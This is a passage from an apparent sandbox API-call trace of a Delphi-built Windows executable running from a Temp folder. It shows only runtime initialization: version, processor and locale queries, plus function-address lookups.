dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, 
szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0116.445] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0116.445] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x214520 [0116.446] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0116.446] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - 
%s") returned 0x16 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0116.446] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0116.446] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.446] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0116.446] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0116.446] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0116.446] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0116.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", 
ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] GetThreadLocale () returned 0x409 [0116.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0116.446] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0116.447] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.447] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0116.447] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0116.447] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x214530 [0116.447] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0116.447] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0116.447] GetLastError () returned 0x7a [0116.447] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0116.447] GetCurrentThreadId () returned 0xdf8 [0116.447] GetCurrentThreadId () returned 0xdf8 [0116.447] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0116.447] GetThreadLocale () returned 0x409 [0116.447] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, 
CalType=0x4) returned 1 [0116.449] GetThreadLocale () returned 0x409 [0116.449] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0116.449] GetCurrentThreadId () returned 0xdf8 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0116.450] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0116.450] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0116.451] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0116.451] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a 
[0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0116.452] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0116.453] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0116.453] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0116.453] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17324187627) returned 1 [0116.453] GetTickCount () returned 0x279ef [0116.453] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x2e2)) [0116.453] 
GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x2e2)) [0116.453] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17324206144) returned 1 [0116.453] GetTickCount () returned 0x279ef [0116.453] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x2e2)) [0116.453] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x2e2)) [0116.453] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0116.453] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0116.453] 
GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0116.453] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0116.454] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0116.454] GetProcAddress (hModule=0x76750000, 
lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0116.454] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0116.454] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0116.454] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 
[0116.454] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0116.454] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0116.454] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0116.454] GetThreadLocale () returned 0x409 [0116.455] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0116.455] GetCurrentThreadId () returned 0xdf8 [0116.455] GetCurrentThreadId () returned 0xdf8 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0116.455] GetThreadLocale () returned 0x409 [0116.455] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0116.455] GetThreadLocale () returned 0x409 [0116.455] EnumCalendarInfoW 
(lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0116.455] GetCurrentThreadId () returned 0xdf8 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0116.455] 